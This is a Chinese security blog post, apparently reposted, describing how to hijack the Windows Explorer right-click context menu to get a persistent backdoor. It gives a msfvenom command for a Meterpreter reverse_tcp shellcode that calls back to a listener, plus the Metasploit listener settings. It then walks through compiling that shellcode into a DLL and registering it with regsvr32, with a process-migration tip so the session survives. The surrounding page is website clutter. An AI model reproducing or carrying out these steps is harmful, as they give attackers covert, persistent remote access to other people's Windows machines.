服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

劫持资源管理器实现持久性后门

日期: 来源:潇湘信安收集编辑:3had0w
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


0x01 前言

最近看到一篇有关《劫持Explorer.exe实现持久性》的文章,只要用户右键单击文件资源管理器中的文件或文件夹就会触发,简单记录下本地复现过程!


0x02 复现过程

CobaltStrike或Metasploit生成一个C格式shellcode,将shellcode中的"都替换为空,再用\r\n将其放在一行,配置好相关参数执行监听。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f c
set payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.120set lport 443exploit

VS打开该项目,在FileContextMenuExt.cpp第13行处插入我们处理好的shellcode,直接编译得到一个ContextMenuHijack.dll。


项目地址:

https://github.com/RistBS/ContextMenuHijack

接着我们通过执行以下命令用regsvr32注册下这个dll文件,如果想卸载掉只需加个/u参数即可。


注册:

regsvr32 ContextMenuHijack.dll

卸载:

regsvr32 /u ContextMenuHijack.dll

这时只要我们右键文件或文件夹就会触发上线,但这种方式极易造成Explorer.exe资源管理器奔溃,导致会话掉线,建议加个自动迁移进程参数。

set AutoRunScript migrate -f

0x03 编译问题

我的VS版本2017,但这个项目是2022编译的,所以编译时可能由于VS版本问题而出现下图报错:
错误 MSB8020 无法找到 v143 的生成工具(平台工具集 =“v143”)。若要使用 v143 生成工具进行生成,请安装 v143 生成工具。或者,可以升级到当前 Visual Studio 工具,方式是通过选择“项目”菜单或右键单击该解决方案,然后选择“重定解决方案目标”


解决方法:
选中项目 -> 右键属性 -> 将平台工具集选为VS2017(V141);选中工程 -> 重定解决方案目标 -> 选择当前Windows SDK版本;打开项目根目录下.vcxproj后缀文件,将v143全替换为v141,保存;切换回Visual Studio,检测到文件修改,我们选择“全部重新加载”;再次选中工程 -> 重新生成解决方案 -> 已经编译成功,完美解决该问题。


参考链接:

https://pentestlab.blog/2023/03/13/persistence-context-menu/https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html


关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读





相关阅读

  • 手把手教你Linux提权

  • 文章来源: 疯猫网络0x01 一般概念我们在 Linux 中特权升级的最终目标是获得root用户用户、组、文件、目录四者之间的关系用户可以属于多个组。组可以具有多个用户。每个文件
  • 一个服务端同学的Vue框架入门及实践

  • 做为服务端同学,接触前端代码较少,刚毕业的时候用过 jQuery + Bootstrap2/3,当时的感觉就是,容易上手,学习门槛相对较低,另外就是有一个非常成熟的 jQuery 插件库,在这里,几乎可以找
  • 预制菜产业扶持政策文件即将发布

  • 3月24日,第七届中国国际食品及配料博览会、首届中国国际预制菜产业博览会在广东省东莞市举办。中国工程院院士、湖南省农科院院长单杨在接受中国农村网记者专访时表示,相关部
  • 精选壁纸 | 黑夜波澜~

  • 「 静静地做自己,让世界发现你 」▼2491期壁纸- 图片来自网络,如侵联删 -- 高清原图获取 -「关注这个号的你可以说是很优秀了 」▼你的每个“在看”,我都认真当成了喜欢

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 世界上最锋利的物体为什么不能切割任何东西

  • 文章来源:万象经验作者:Eugene Wang有一种情况可以证明,世界上最锋利的物体无法切割任何东西。我们都用刀切过苹果,刀很锋利对我们来说是显而易见的事情。但如果工具很锋利,那么
  • 边缘计算,原来早就在你我身边

  • 文章来源:中兴文档原文作者:中兴文档过去十年,无线通信的革新与人工智能的复兴使人类社会发生了翻天覆地的变化。这两股新兴力量的交织碰撞,推动着移动通信系统的一步步演进,从一
  • 如何评价一部手机的通信能力?

  • 文章来源:慧智微电子原文作者:彭自2007年iPhone初代发布以来,智能手机快速发展,屏幕、拍照、运算能力均得到大幅度提高,现在已经成为我们生活中不可缺少的移动智能中枢。不过在过
  • 函数式编程减少漏洞的新方法

  • 文章来源:悦智网原文作者:Charles Scalfani你可能认为软件产品生命周期中耗时最长、费用最高的阶段是系统的初期开发阶段,因为所有美妙的功能都是在这一阶段构想出来的。而事实
  • 劫持资源管理器实现持久性后门

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试